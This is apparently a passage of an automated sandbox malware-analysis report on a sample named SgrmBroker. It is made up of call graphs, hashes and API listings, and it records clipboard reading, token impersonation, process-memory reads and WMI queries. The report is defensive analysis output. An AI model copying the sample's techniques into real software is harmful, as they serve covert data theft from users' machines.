17902 7ff6d9dce5db 17895->17902 17899 7ff6d9dce88a HeapFree 17896->17899 17897->17899 17921 7ff6d9dce7b2 17897->17921 17899->17815 17911 7ff6d9dce8af HeapFree 17899->17911 17900->17869 17923 7ff6d9dce4c0 HeapFree 17900->17923 17908 7ff6d9dce643 HeapFree 17901->17908 17907 7ff6d9dce5e2 17902->17907 17902->17908 17903->17873 17913 7ff6d9dcea97 HeapFree 17904->17913 17904->17916 17914 7ff6d9dcef83 GetLastError 17905->17914 17915 7ff6d9dceead 17905->17915 17906 7ff6d9dceaeb 17906->17828 17917 7ff6d9dceaf6 HeapFree 17906->17917 17927 7ff6d9dce62d HeapFree 17907->17927 17940 7ff6d9dce90b 17907->17940 17908->17843 17910->17878 17911->17815 17912 7ff6d9dced02 17912->17867 17918 7ff6d9dceddb RtlFreeHeap 17912->17918 17913->17916 17919 7ff6d9dcef88 HeapFree 17914->17919 17915->17919 17928 7ff6d9dceebd 17915->17928 17916->17906 17920 7ff6d9dcead6 HeapFree 17916->17920 17917->17828 17918->17867 17919->17850 17924 7ff6d9dcefaf HeapFree 17919->17924 17920->17916 17922 7ff6d9dbade0 4 API calls 17921->17922 17925 7ff6d9dce7f4 17922->17925 17923->17900 17924->17850 17932 7ff6d9dce832 17925->17932 17933 7ff6d9dce8d7 17925->17933 17926 7ff6d9dce9f8 RtlFreeHeap 17926->17861 17927->17907 17930 7ff6d9dbade0 4 API calls 17928->17930 17929->17850 17929->17912 17939 7ff6d9dbade0 4 API calls 17929->17939 17947 7ff6d9d4af80 7 API calls 17929->17947 17931 7ff6d9dceef9 17930->17931 17941 7ff6d9dcef2b 17931->17941 17942 7ff6d9dcefd9 17931->17942 17935 7ff6d9dce86e 17932->17935 17936 7ff6d9dce858 HeapFree 17932->17936 17937 7ff6d9dce8e2 HeapFree 17933->17937 17938 7ff6d9dce8f4 HeapFree 17933->17938 17934 7ff6d9dce95a 17934->17926 17935->17938 17936->17935 17937->17938 17938->17815 17939->17929 17940->17850 17940->17926 17940->17934 17948 7ff6d9dbade0 4 API calls 17940->17948 17968 7ff6d9d4af80 17940->17968 17945 7ff6d9dcef55 HeapFree 17941->17945 17946 7ff6d9dcef70 17941->17946 17943 7ff6d9dcefe4 HeapFree 17942->17943 17944 7ff6d9dceff8 HeapFree 17942->17944 17943->17944 17944->17850 17945->17946 17946->17944 17947->17929 17948->17940 17951 7ff6d9dcf3c0 GetErrorInfo 17950->17951 17952 7ff6d9dcf3eb 17950->17952 17951->17952 17953 7ff6d9dc9960 3 API calls 17952->17953 17959 7ff6d9dcf495 17952->17959 17954 7ff6d9dcf42c 17953->17954 17955 7ff6d9dcf4c3 17954->17955 17956 7ff6d9dcf435 NtQueryInformationProcess 17954->17956 17957 7ff6d9dcf483 HeapFree 17956->17957 17958 7ff6d9dcf459 17956->17958 17957->17959 17960 7ff6d9dcf260 9 API calls 17958->17960 17959->17856 17961 7ff6d9dcf46f HeapFree 17960->17961 17961->17959 17963 7ff6d9dbadf5 17962->17963 17966 7ff6d9dbae13 17962->17966 17964 7ff6d9dc9960 3 API calls 17963->17964 17963->17966 17964->17966 17965 7ff6d9dbb01b 17965->17845 17966->17965 17967 7ff6d9de6040 4 API calls 17966->17967 17967->17966 17969 7ff6d9d4af93 17968->17969 17972 7ff6d9d4b007 17968->17972 17970 7ff6d9dc9d80 4 API calls 17969->17970 17969->17972 17970->17972 17971 7ff6d9d4b233 17973 7ff6d9d4b29c HeapFree 17971->17973 17974 7ff6d9d4b00e 17971->17974 17972->17971 17972->17974 17975 7ff6d9dc9960 3 API calls 17972->17975 17976 7ff6d9d4b16e 17972->17976 17973->17971 17974->17940 17975->17976 17976->17974 18017 7ff6d9d41c90 17976->18017 17979 7ff6d9d4b1d4 17979->17974 17980 7ff6d9d4b1fb HeapFree 17979->17980 17980->17974 17982 7ff6d9dcf182 17981->17982 17983 7ff6d9dcf258 17981->17983 17982->17983 17984 7ff6d9dc9960 3 API calls 17982->17984 17985 7ff6d9dcf1b7 17984->17985 17985->17983 17986 7ff6d9dcf1c0 ReadProcessMemory 17985->17986 17987 7ff6d9dcf206 GetLastError 17986->17987 17989 7ff6d9dcf1ec 17986->17989 17990 7ff6d9dcf225 HeapFree 17987->17990 17988 7ff6d9dceb95 17988->17853 17988->17878 17989->17988 17989->17990 17990->17988 17992 7ff6d9dcde06 17991->17992 17993 7ff6d9dcf071 IsValidSid 17991->17993 17992->17833 17992->17834 17993->17992 17994 7ff6d9dcf081 GetLengthSid 17993->17994 17995 7ff6d9dcf08e 17994->17995 17996 7ff6d9dcf0d6 CopySid 17994->17996 17998 7ff6d9dc9960 3 API calls 17995->17998 17996->17992 17997 7ff6d9dcf0ea GetLastError 17996->17997 17997->17992 17999 7ff6d9dcf0a5 17998->17999 17999->17992 18000 7ff6d9dcf0ae CopySid 17999->18000 18000->17992 18001 7ff6d9dcf106 GetLastError HeapFree 18000->18001 18001->17992 18003 7ff6d9dcde1f 18002->18003 18004 7ff6d9dcf038 HeapFree 18002->18004 18005 7ff6d9dcf140 CloseHandle 18003->18005 18004->18003 18006 7ff6d9dcf14e 18005->18006 18006->17885 18008 7ff6d9de7fbd 18007->18008 18009 7ff6d9de7fb8 18007->18009 18010 7ff6d9de5ca0 3 API calls 18008->18010 18009->17823 18010->18009 18012 7ff6d9dce443 HeapFree 18011->18012 18014 7ff6d9dcf28d 18011->18014 18012->17900 18013 7ff6d9dcf338 LocalFree 18013->18012 18014->18013 18015 7ff6d9dbade0 4 API calls 18014->18015 18016 7ff6d9d4af80 7 API calls 18014->18016 18015->18014 18016->18014 18018 7ff6d9d41d09 18017->18018 18019 7ff6d9d41caa 18017->18019 18018->17971 18018->17979 18019->18018 18020 7ff6d9d41cea HeapFree 18019->18020 18020->18018

                                                                                      Executed Functions

                                                                                      Function 00007FF6D9DBFA10 Relevance: 189.3, APIs: 99, Strings: 7, Instructions: 3803memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Free$Heap$EnvironmentStrings$AddressCompareOrdinalSingleStringWake
                                                                                      • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$=$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$p
                                                                                      • API String ID: 2893925715-605661072
                                                                                      • Opcode ID: abf6f998de198fb72599f47d71bd1c3ed7613587fb29a02c65eb20443f034696
                                                                                      • Instruction ID: c8e60c667bddd861d5d3131a67c7187011c9c34b75b017f09c0ac15e967b68f0
                                                                                      • Opcode Fuzzy Hash: abf6f998de198fb72599f47d71bd1c3ed7613587fb29a02c65eb20443f034696
                                                                                      • Instruction Fuzzy Hash: E983A222A0CED281EA719F15E4443BEA7A1FB88B94F444237DA9D97B99DF3CD461C700
                                                                                      Function 00007FF6D9CFDB59 Relevance: 125.2, APIs: 57, Strings: 13, Instructions: 2713memorythreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Free$Thread$CurrentDescriptionExceptionGuaranteeHandlerProcessStackVectored
                                                                                      • String ID: $ $V1N*~GX$^F|m%dIS$arenegyl$arenegyl$main$modnarod$modnarod$setybdet$setybdet$uespemos$uespemos
                                                                                      • API String ID: 3189231204-887744486
                                                                                      • Opcode ID: d3f3f8f4880be2e2ba43278f170bae56eb76ebb1d8e88676a972b7f7af556f38
                                                                                      • Instruction ID: 5bd083b3d25b89ef67c8fab01cc6dfb88f281e3e678f14a4e7321c6348bf669a
                                                                                      • Opcode Fuzzy Hash: d3f3f8f4880be2e2ba43278f170bae56eb76ebb1d8e88676a972b7f7af556f38
                                                                                      • Instruction Fuzzy Hash: 2853B232619BD181EBA18F16E4503BE77A1FB88B80F448236DA8D87B99DF3CD525C740
                                                                                      Function 00007FF6D9CFBF68 Relevance: 103.0, APIs: 56, Strings: 2, Instructions: 1463memorynativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeHeapInformationQuery$CloseHandle
                                                                                      • String ID: $main
                                                                                      • API String ID: 1158601441-474169129
                                                                                      • Opcode ID: 44c87d6660bac3bb190a17a80cfd78c33820fffea89a8e1459b98cd017e14407
                                                                                      • Instruction ID: 7d13db92c7f39e06d97e0b1ffd0a76c33c8487489935d8e33ee93a7bba564733
                                                                                      • Opcode Fuzzy Hash: 44c87d6660bac3bb190a17a80cfd78c33820fffea89a8e1459b98cd017e14407
                                                                                      • Instruction Fuzzy Hash: 5FE28F32A09B8181EA609F11E4403BE67B0FB89BD8F544237DA9D87BA5DF3CE565C740
                                                                                      Function 00007FF6D9DCDA50 Relevance: 100.2, APIs: 66, Instructions: 1209memorynativetimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLast$Information$HeapToken$MemoryQueryReadTimes$AllocCloseCountersFreeHandleOpenSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3519098311-0
                                                                                      • Opcode ID: 8a7b5a9d83be089031172fb6e521d659fa4de7893426e574d961a6295065d13a
                                                                                      • Instruction ID: b4401a40a631cbe64610859eb08480027eee744d69fe8928bc7903e04843cad3
                                                                                      • Opcode Fuzzy Hash: 8a7b5a9d83be089031172fb6e521d659fa4de7893426e574d961a6295065d13a
                                                                                      • Instruction Fuzzy Hash: 31C29562A08F8686E7648F16E4443BE67A1FF89B94F444637DA8D83794DF3CE4A4C710
                                                                                      Function 00007FF6D9CF8B9D Relevance: 61.5, APIs: 27, Strings: 7, Instructions: 1965memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Heap$String$ErrorInfo$AllocateBlanketCreateInstanceProcessProxy
                                                                                      • String ID: 0$ROOT\CIMV2$UP$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner$Vr$c${o
                                                                                      • API String ID: 1388123693-743638217
                                                                                      • Opcode ID: a82baf6901ad28eaa3218fa9b6457a8307f4107da804e78cb88e8bb6a9ec7d7d
                                                                                      • Instruction ID: 3d48a3638ccf8ff5514ff1ece2cd4e702e1c7faf5229db1ee1eb077aae44be96
                                                                                      • Opcode Fuzzy Hash: a82baf6901ad28eaa3218fa9b6457a8307f4107da804e78cb88e8bb6a9ec7d7d
                                                                                      • Instruction Fuzzy Hash: 94233636609BC185EA618F15E4403EEB7B4FB98B84F448226DACD83B99DF7CD564CB40
                                                                                      Function 00007FF6D9CFD2B0 Relevance: 36.3, APIs: 24, Instructions: 286memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2635 7ff6d9cfd2b0-7ff6d9cfd2cb 2637 7ff6d9cfd2cd-7ff6d9cfd2ed HeapFree 2635->2637 2639 7ff6d9cfd2ef-7ff6d9cfd300 HeapFree 2637->2639 2640 7ff6d9cfd306-7ff6d9cfd310 2637->2640 2639->2640 2641 7ff6d9cfd325-7ff6d9cfd32f 2640->2641 2642 7ff6d9cfd312-7ff6d9cfd315 2640->2642 2644 7ff6d9cfd344-7ff6d9cfd34e 2641->2644 2645 7ff6d9cfd331-7ff6d9cfd334 2641->2645 2642->2641 2643 7ff6d9cfd317-7ff6d9cfd31f CloseHandle 2642->2643 2643->2641 2647 7ff6d9cfd363-7ff6d9cfd36e 2644->2647 2648 7ff6d9cfd350-7ff6d9cfd353 2644->2648 2645->2644 2646 7ff6d9cfd336-7ff6d9cfd33e CloseHandle 2645->2646 2646->2644 2649 7ff6d9cfd374-7ff6d9cfd387 2647->2649 2650 7ff6d9cfd69b-7ff6d9cfd6a4 2647->2650 2648->2647 2651 7ff6d9cfd355-7ff6d9cfd35d CloseHandle 2648->2651 2652 7ff6d9cfd422-7ff6d9cfd42f 2649->2652 2653 7ff6d9cfd38d-7ff6d9cfd390 2649->2653 2654 7ff6d9cfd6bd-7ff6d9cfd75e call 7ff6d9cfd6d0 2650->2654 2655 7ff6d9cfd6a6-7ff6d9cfd6b7 HeapFree 2650->2655 2651->2647 2658 7ff6d9cfd462-7ff6d9cfd465 2652->2658 2656 7ff6d9cfd392-7ff6d9cfd39c 2653->2656 2657 7ff6d9cfd40e-7ff6d9cfd414 2653->2657 2677 7ff6d9cfd77f-7ff6d9cfd811 call 7ff6d9cf1530 GetClipboardData GlobalLock GlobalSize WideCharToMultiByte 2654->2677 2655->2654 2661 7ff6d9cfd39e-7ff6d9cfd3a2 2656->2661 2662 7ff6d9cfd3bc-7ff6d9cfd3c0 2656->2662 2663 7ff6d9cfd41a-7ff6d9cfd41d 2657->2663 2664 7ff6d9cfd666-7ff6d9cfd66d 2657->2664 2665 7ff6d9cfd490-7ff6d9cfd493 2658->2665 2666 7ff6d9cfd467-7ff6d9cfd472 2658->2666 2672 7ff6d9cfd3b0-7ff6d9cfd3ba 2661->2672 2662->2657 2674 7ff6d9cfd3c2-7ff6d9cfd3ce 2662->2674 2675 7ff6d9cfd689-7ff6d9cfd695 HeapFree 2663->2675 2673 7ff6d9cfd670-7ff6d9cfd687 HeapFree 2664->2673 2670 7ff6d9cfd495-7ff6d9cfd49f 2665->2670 2671 7ff6d9cfd4c4-7ff6d9cfd4c7 2665->2671 2667 7ff6d9cfd540-7ff6d9cfd546 2666->2667 2668 7ff6d9cfd478-7ff6d9cfd47e 2666->2668 2682 7ff6d9cfd54c-7ff6d9cfd56d HeapFree 2667->2682 2683 7ff6d9cfd657-7ff6d9cfd664 call 7ff6d9d00ff0 2667->2683 2676 7ff6d9cfd56f-7ff6d9cfd572 2668->2676 2678 7ff6d9cfd4a1-7ff6d9cfd4a8 2670->2678 2679 7ff6d9cfd4c9-7ff6d9cfd4d0 2670->2679 2680 7ff6d9cfd51e-7ff6d9cfd52e 2671->2680 2672->2662 2672->2672 2673->2673 2673->2675 2681 7ff6d9cfd3d0-7ff6d9cfd40c 2674->2681 2675->2650 2684 7ff6d9cfd610-7ff6d9cfd615 2676->2684 2685 7ff6d9cfd578-7ff6d9cfd586 2676->2685 2717 7ff6d9d00f3e-7ff6d9d00f96 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff6d9dc9960 2677->2717 2718 7ff6d9cfd817-7ff6d9cfd842 call 7ff6d9d29420 2677->2718 2688 7ff6d9cfd4b0-7ff6d9cfd4ba 2678->2688 2679->2680 2689 7ff6d9cfd4d2 2679->2689 2680->2668 2690 7ff6d9cfd534 2680->2690 2681->2657 2681->2681 2682->2667 2682->2676 2683->2664 2696 7ff6d9cfd618-7ff6d9cfd62c 2684->2696 2691 7ff6d9cfd5fe-7ff6d9cfd601 2685->2691 2692 7ff6d9cfd588-7ff6d9cfd58f 2685->2692 2688->2688 2695 7ff6d9cfd4bc-7ff6d9cfd4c0 2688->2695 2697 7ff6d9cfd4e0-7ff6d9cfd51c 2689->2697 2690->2667 2691->2696 2698 7ff6d9cfd5b5-7ff6d9cfd5bd 2692->2698 2699 7ff6d9cfd591-7ff6d9cfd594 2692->2699 2695->2697 2701 7ff6d9cfd4c2 2695->2701 2702 7ff6d9cfd62e-7ff6d9cfd636 2696->2702 2703 7ff6d9cfd639-7ff6d9cfd63e 2696->2703 2697->2680 2697->2697 2698->2691 2705 7ff6d9cfd5bf 2698->2705 2704 7ff6d9cfd5a0-7ff6d9cfd5aa 2699->2704 2701->2680 2702->2703 2707 7ff6d9cfd644-7ff6d9cfd649 2703->2707 2708 7ff6d9cfd458-7ff6d9cfd460 2703->2708 2704->2704 2711 7ff6d9cfd5ac-7ff6d9cfd5b2 2704->2711 2712 7ff6d9cfd5c0-7ff6d9cfd5fc 2705->2712 2709 7ff6d9cfd440-7ff6d9cfd443 2707->2709 2710 7ff6d9cfd64f-7ff6d9cfd652 2707->2710 2708->2657 2708->2658 2715 7ff6d9cfd447-7ff6d9cfd455 HeapFree 2709->2715 2710->2715 2711->2698 2712->2691 2712->2712 2715->2708 2723 7ff6d9d00f9a-7ff6d9d00fbb 2717->2723 2724 7ff6d9d00f98 2717->2724 2718->2717 2725 7ff6d9cfd848-7ff6d9cfd87c WideCharToMultiByte 2718->2725 2726 7ff6d9d00fc0-7ff6d9d00fc4 2723->2726 2724->2723 2727 7ff6d9cfd880-7ff6d9cfd885 2725->2727 2726->2724 2728 7ff6d9d00fc6-7ff6d9d00fd3 2726->2728 2729 7ff6d9cfd892-7ff6d9cfd8cb GlobalUnlock GetCurrentThread ImpersonateAnonymousToken CloseClipboard 2727->2729 2730 7ff6d9cfd887-7ff6d9cfd88d 2727->2730 2728->2726 2733 7ff6d9d00fd5-7ff6d9d00ff7 call 7ff6d9db9a40 call 7ff6d9cfbf40 2728->2733 2734 7ff6d9cfd8d3-7ff6d9cfd8de 2729->2734 2735 7ff6d9cfd8cd RevertToSelf 2729->2735 2730->2727 2731 7ff6d9cfd88f 2730->2731 2731->2729 2749 7ff6d9d00ffd-7ff6d9d01006 HeapFree 2733->2749 2750 7ff6d9d00ff9 2733->2750 2737 7ff6d9cfd8f2-7ff6d9cfd8f5 2734->2737 2738 7ff6d9cfd8e0-7ff6d9cfd8ec HeapFree 2734->2738 2735->2734 2740 7ff6d9cfd912-7ff6d9cfd915 2737->2740 2741 7ff6d9cfd8f7-7ff6d9cfd90c call 7ff6d9dd4ee0 2737->2741 2738->2737 2740->2717 2745 7ff6d9cfd91b-7ff6d9cfd935 call 7ff6d9dc9960 2740->2745 2741->2740 2751 7ff6d9cfda1a 2741->2751 2745->2717 2757 7ff6d9cfd93b-7ff6d9cfdaf9 call 7ff6d9dd4fe0 2745->2757 2750->2749 2753 7ff6d9cfda1f-7ff6d9cfda34 CreateWaitableTimerExW 2751->2753 2755 7ff6d9cfda3a-7ff6d9cfdaa9 SetWaitableTimer WaitForSingleObject CloseHandle 2753->2755 2756 7ff6d9cfd769-7ff6d9cfd77a Sleep 2753->2756 2755->2677 2760 7ff6d9cfdaaf 2755->2760 2756->2677 2763 7ff6d9cfdb12-7ff6d9cfdb28 2757->2763 2764 7ff6d9cfdafb-7ff6d9cfdb0c HeapFree 2757->2764 2760->2756 2763->2753 2764->2763
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 1910495013-0
                                                                                      • Opcode ID: 681293f55c76c5ee27876b0540fda4049ae221a60d5d32763f68924ca7a6df02
                                                                                      • Instruction ID: 180d7f4776e07be71eb9eb8366028009c4d4ff70d26e3c7cae33fa7dd54811a6
                                                                                      • Opcode Fuzzy Hash: 681293f55c76c5ee27876b0540fda4049ae221a60d5d32763f68924ca7a6df02
                                                                                      • Instruction Fuzzy Hash: 07C16021A09B8182E6A49F12A8443BE67B1FF89BD4F044237DE9E977D5DF3CE4658700
                                                                                      Function 00007FF6D9CF4140 Relevance: 31.9, APIs: 21, Instructions: 355memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2766 7ff6d9cf4140-7ff6d9cf415f 2767 7ff6d9cf4165-7ff6d9cf4171 2766->2767 2768 7ff6d9cf440f-7ff6d9cf4419 2766->2768 2771 7ff6d9cf43da-7ff6d9cf43f7 2767->2771 2772 7ff6d9cf4177-7ff6d9cf4196 2767->2772 2769 7ff6d9cf442d-7ff6d9cf444b HeapFree 2768->2769 2770 7ff6d9cf441b-7ff6d9cf4426 2768->2770 2775 7ff6d9cf4451-7ff6d9cf445c 2769->2775 2777 7ff6d9cf44d8-7ff6d9cf44dc 2769->2777 2770->2775 2776 7ff6d9cf4428 2770->2776 2771->2768 2774 7ff6d9cf43f9-7ff6d9cf4409 RtlFreeHeap 2771->2774 2773 7ff6d9cf41b3-7ff6d9cf41b6 2772->2773 2778 7ff6d9cf41de-7ff6d9cf41fe 2773->2778 2779 7ff6d9cf41b8 2773->2779 2774->2768 2782 7ff6d9cf4469-7ff6d9cf446e 2775->2782 2776->2777 2780 7ff6d9cf44f0-7ff6d9cf44fa 2777->2780 2781 7ff6d9cf44de-7ff6d9cf44ea HeapFree 2777->2781 2784 7ff6d9cf4213-7ff6d9cf4224 2778->2784 2785 7ff6d9cf4200-7ff6d9cf4210 HeapFree 2778->2785 2783 7ff6d9cf41c0-7ff6d9cf41da 2779->2783 2786 7ff6d9cf4500-7ff6d9cf450a 2780->2786 2787 7ff6d9cf469c-7ff6d9cf46ac 2780->2787 2781->2780 2788 7ff6d9cf4480-7ff6d9cf4485 2782->2788 2789 7ff6d9cf4470-7ff6d9cf447d HeapFree 2782->2789 2783->2783 2790 7ff6d9cf41dc 2783->2790 2791 7ff6d9cf4260-7ff6d9cf4268 2784->2791 2792 7ff6d9cf4226-7ff6d9cf422a 2784->2792 2785->2784 2793 7ff6d9cf4510-7ff6d9cf452b 2786->2793 2794 7ff6d9cf458a-7ff6d9cf459e 2786->2794 2795 7ff6d9cf4497-7ff6d9cf44a1 2788->2795 2796 7ff6d9cf4487-7ff6d9cf4494 HeapFree 2788->2796 2789->2788 2790->2778 2803 7ff6d9cf426a-7ff6d9cf4276 HeapFree 2791->2803 2804 7ff6d9cf4279-7ff6d9cf4286 2791->2804 2801 7ff6d9cf4239-7ff6d9cf423e 2792->2801 2802 7ff6d9cf4550-7ff6d9cf4553 2793->2802 2797 7ff6d9cf45a0-7ff6d9cf45a8 CloseHandle 2794->2797 2798 7ff6d9cf45aa-7ff6d9cf45b9 2794->2798 2799 7ff6d9cf44a3-7ff6d9cf44a8 2795->2799 2800 7ff6d9cf44b0-7ff6d9cf44c4 HeapFree 2795->2800 2796->2795 2797->2798 2805 7ff6d9cf45cc-7ff6d9cf45e0 GetLastError 2797->2805 2808 7ff6d9cf45e2-7ff6d9cf45f2 PdhCloseQuery 2798->2808 2809 7ff6d9cf45bb-7ff6d9cf45c5 2798->2809 2806 7ff6d9cf44aa 2799->2806 2807 7ff6d9cf44c6-7ff6d9cf44d6 HeapFree 2799->2807 2800->2807 2810 7ff6d9cf4460-7ff6d9cf4467 2800->2810 2811 7ff6d9cf4230-7ff6d9cf4237 2801->2811 2812 7ff6d9cf4240-7ff6d9cf4250 HeapFree 2801->2812 2813 7ff6d9cf4555 2802->2813 2814 7ff6d9cf4530-7ff6d9cf4533 2802->2814 2803->2804 2815 7ff6d9cf42b0-7ff6d9cf42d0 RtlFreeHeap 2804->2815 2816 7ff6d9cf4288-7ff6d9cf4295 2804->2816 2805->2808 2805->2809 2806->2810 2807->2810 2808->2787 2819 7ff6d9cf45f8-7ff6d9cf45fb 2808->2819 2809->2819 2820 7ff6d9cf45c7 2809->2820 2810->2777 2810->2782 2811->2791 2811->2801 2812->2811 2822 7ff6d9cf4560-7ff6d9cf4579 2813->2822 2821 7ff6d9cf4535-7ff6d9cf454e PdhRemoveCounter 2814->2821 2817 7ff6d9cf42d2-7ff6d9cf42f6 HeapFree 2815->2817 2818 7ff6d9cf4297-7ff6d9cf42a8 2815->2818 2816->2817 2816->2818 2824 7ff6d9cf42f8-7ff6d9cf42fc 2817->2824 2825 7ff6d9cf4330-7ff6d9cf4338 2817->2825 2823 7ff6d9cf42aa 2818->2823 2818->2824 2826 7ff6d9cf4601-7ff6d9cf4618 2819->2826 2827 7ff6d9cf4688-7ff6d9cf469a 2819->2827 2820->2787 2821->2794 2821->2802 2822->2822 2828 7ff6d9cf457b-7ff6d9cf4588 2822->2828 2823->2825 2830 7ff6d9cf4309-7ff6d9cf430e 2824->2830 2831 7ff6d9cf433a-7ff6d9cf4346 RtlFreeHeap 2825->2831 2832 7ff6d9cf4349-7ff6d9cf4356 2825->2832 2833 7ff6d9cf462f-7ff6d9cf4633 2826->2833 2827->2787 2829 7ff6d9cf46ad-7ff6d9cf46dc HeapFree 2827->2829 2828->2821 2834 7ff6d9cf4300-7ff6d9cf4307 2830->2834 2835 